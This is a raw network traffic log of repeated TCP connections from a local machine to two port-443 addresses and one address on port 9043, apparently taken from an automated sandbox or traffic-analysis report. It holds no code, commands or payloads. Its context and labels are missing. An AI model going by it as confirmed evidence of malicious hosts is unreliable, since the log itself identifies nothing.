                                                                                                                                          Nov 13, 2024 18:23:02.534353971 CET50049443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:02.537909985 CET50049443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:02.537970066 CET44350049104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:02.549917936 CET50050443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:02.550025940 CET44350050104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:02.550152063 CET50050443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:02.553920031 CET50050443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:02.553957939 CET44350050104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:03.439692974 CET44350050104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:03.439759970 CET50050443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:03.440279007 CET50050443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:03.440289974 CET44350050104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:03.441768885 CET50050443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:03.441778898 CET44350050104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:03.942473888 CET44350050104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:03.942572117 CET44350050104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:03.946547985 CET50050443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:03.957907915 CET50050443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:03.957938910 CET44350050104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:04.069928885 CET50051443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:04.069998026 CET44350051104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:04.070261955 CET50051443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:04.070580959 CET50051443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:04.070609093 CET44350051104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:04.744266987 CET44350051104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:04.744339943 CET50051443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:04.744797945 CET50051443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:04.744815111 CET44350051104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:04.746006012 CET50051443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:04.746030092 CET44350051104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:04.779051065 CET500099043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:23:04.779591084 CET500529043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:23:04.784183025 CET90435000945.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:04.784240007 CET500099043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:23:04.784424067 CET90435005245.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:04.784502983 CET500529043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:23:04.784754992 CET500529043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:23:04.789603949 CET90435005245.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:05.115711927 CET44350051104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:05.115799904 CET50051443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:05.115837097 CET44350051104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:05.115858078 CET44350051104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:05.115880013 CET50051443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:05.115896940 CET50051443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:05.116117954 CET50051443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:05.116142035 CET44350051104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:05.126576900 CET50053443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:05.126619101 CET44350053104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:05.126689911 CET50053443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:05.126914978 CET50053443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:05.126926899 CET44350053104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.360872984 CET90435005245.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.361177921 CET90435005245.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.361268044 CET500529043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:23:06.361529112 CET90435005245.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.361689091 CET500529043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:23:06.362695932 CET500529043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:23:06.362695932 CET500529043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:23:06.363543987 CET44350053104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.367172956 CET50053443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:06.367173910 CET50053443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:06.367173910 CET50053443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:06.367204905 CET44350053104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.367223024 CET44350053104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.369996071 CET90435005245.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.370008945 CET90435005245.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.803632975 CET90435005245.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.803703070 CET500529043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:23:06.879962921 CET44350053104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.880044937 CET50053443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:06.880067110 CET44350053104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.880080938 CET44350053104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.880130053 CET50053443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:06.880130053 CET50053443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:06.881880999 CET50053443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:06.881901026 CET44350053104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.885298014 CET50054443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:06.885349035 CET44350054104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:06.885545015 CET50054443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:06.885700941 CET50054443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:06.885714054 CET44350054104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:07.791798115 CET44350054104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:07.792038918 CET50054443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:07.792437077 CET50054443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:07.792447090 CET44350054104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:07.797517061 CET50054443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:07.797524929 CET44350054104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:08.333695889 CET44350054104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:08.333798885 CET44350054104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:08.333933115 CET50054443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:08.335340977 CET50054443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:08.339335918 CET50054443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:08.339354038 CET44350054104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:08.347903013 CET50055443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:08.347943068 CET44350055104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:08.348031998 CET50055443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:08.351902008 CET50055443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:08.351917028 CET44350055104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:09.034061909 CET44350055104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:09.034125090 CET50055443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:09.034627914 CET50055443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:09.034634113 CET44350055104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:09.036195040 CET50055443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:09.036200047 CET44350055104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:09.296993971 CET44350055104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:09.297055960 CET50055443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:09.297080994 CET44350055104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:09.297110081 CET44350055104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:09.297122002 CET50055443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:09.297148943 CET50055443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:09.297605038 CET50055443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:09.297620058 CET44350055104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:09.304275036 CET50056443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:09.304342031 CET44350056104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:09.304409981 CET50056443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:09.304708004 CET50056443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:09.304729939 CET44350056104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:10.241528034 CET44350056104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:10.241739988 CET50056443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:10.242247105 CET50056443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:10.242257118 CET44350056104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:10.243971109 CET50056443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:10.243977070 CET44350056104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:10.834408045 CET44350056104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:10.834470034 CET50056443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:10.834480047 CET44350056104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:10.834523916 CET44350056104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:10.834562063 CET50056443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:10.834602118 CET50056443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:10.834851027 CET50056443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:10.834861994 CET44350056104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:10.850162029 CET50057443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:10.850200891 CET44350057104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:10.850269079 CET50057443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:10.850686073 CET50057443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:10.850697041 CET44350057104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:11.469640970 CET44350057104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:11.469710112 CET50057443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:11.470210075 CET50057443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:11.470221996 CET44350057104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:11.471492052 CET50057443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:11.471508980 CET44350057104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:11.861362934 CET44350057104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:11.861507893 CET44350057104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:11.861521959 CET50057443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:11.861715078 CET50057443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:11.861715078 CET50057443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:11.865916967 CET50058443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:11.865983963 CET44350058104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:11.866105080 CET50058443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:11.866329908 CET50058443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:11.866348982 CET44350058104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:12.169070005 CET50057443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:12.169094086 CET44350057104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:12.752244949 CET44350058104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:12.752330065 CET50058443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:12.752783060 CET50058443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:12.752793074 CET44350058104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:12.753839016 CET50058443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:12.753844023 CET44350058104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:13.563798904 CET44350058104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:13.563906908 CET44350058104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:13.563915014 CET50058443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:13.563946962 CET50058443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:13.586774111 CET50058443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:13.586805105 CET44350058104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:13.600847006 CET50059443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:13.600893021 CET44350059104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:13.600950956 CET50059443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:13.601834059 CET50059443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:13.601851940 CET44350059104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:14.697448015 CET44350059104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:14.697820902 CET50059443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:14.698471069 CET50059443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:14.698476076 CET44350059104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:14.700133085 CET50059443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:14.700139046 CET44350059104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:15.200722933 CET44350059104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:15.200783014 CET50059443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:15.200798035 CET44350059104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:15.200836897 CET50059443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:15.200839996 CET44350059104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:15.200882912 CET50059443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:15.201195955 CET50059443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:15.201211929 CET44350059104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:15.207206011 CET50061443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:15.207297087 CET44350061104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:15.207452059 CET50061443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:15.207606077 CET50061443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:15.207642078 CET44350061104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:16.143980026 CET44350061104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:16.145915985 CET50061443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:16.167918921 CET50061443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:16.167942047 CET44350061104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:16.169214010 CET50061443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:16.169218063 CET44350061104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:16.718314886 CET44350061104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:16.718483925 CET44350061104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:16.718494892 CET50061443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:16.718543053 CET50061443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:16.718724966 CET50061443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:16.718746901 CET44350061104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:16.736334085 CET50062443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:16.736377954 CET44350062104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:16.736459970 CET50062443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:16.736747026 CET50062443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:16.736758947 CET44350062104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:17.621294975 CET44350062104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:17.621378899 CET50062443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:17.622037888 CET50062443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:17.622046947 CET44350062104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:17.623647928 CET50062443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:17.623657942 CET44350062104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:18.309994936 CET44350062104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:18.310086966 CET44350062104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:18.310158014 CET50062443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:18.310158968 CET50062443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:18.310728073 CET50062443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:18.310745001 CET44350062104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:18.317908049 CET50063443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:18.317975044 CET44350063104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:18.322165966 CET50063443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:18.322165966 CET50063443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:18.322244883 CET44350063104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:19.190823078 CET44350063104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:19.190901041 CET50063443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:19.191380024 CET50063443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:19.191401005 CET44350063104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:19.192873001 CET50063443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:19.192893028 CET44350063104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:19.975676060 CET44350063104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:19.975763083 CET44350063104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:19.975929022 CET50063443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:19.981916904 CET50063443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:19.981947899 CET44350063104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:19.994088888 CET50064443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:19.994121075 CET44350064104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:19.994330883 CET50064443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:19.994530916 CET50064443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:19.994540930 CET44350064104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:20.884825945 CET44350064104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:20.884938002 CET50064443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:20.885504961 CET50064443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:20.885514975 CET44350064104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:20.886591911 CET50064443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:20.886601925 CET44350064104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:21.375571012 CET44350064104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:21.375643015 CET50064443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:21.375654936 CET44350064104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:21.375674963 CET44350064104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:21.375691891 CET50064443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:21.375722885 CET50064443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:21.376029015 CET50064443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:21.376043081 CET44350064104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:21.381396055 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:21.381501913 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:21.381964922 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:21.382216930 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:21.382251024 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.316711903 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.316802025 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:22.317260981 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:22.317293882 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.318247080 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:22.318262100 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.888437986 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.888578892 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:22.888645887 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.888730049 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:22.888745070 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.888856888 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:22.889157057 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.889266014 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.889337063 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:22.901556015 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:22.901590109 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.964432001 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:22.964472055 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.964618921 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:22.988432884 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:22.988451004 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.601006031 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.601064920 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.601608038 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.601618052 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.603106976 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.603116035 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.988975048 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.989033937 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.989053011 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.989068031 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.989113092 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.989113092 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.989382029 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.989402056 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.994173050 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:23.994230032 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.994349957 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:23.994576931 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:23.994589090 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:24.783565998 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:24.783668995 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:24.784106016 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:24.784111977 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:24.785250902 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:24.785257101 CET44350067104.21.15.162192.168.2.6
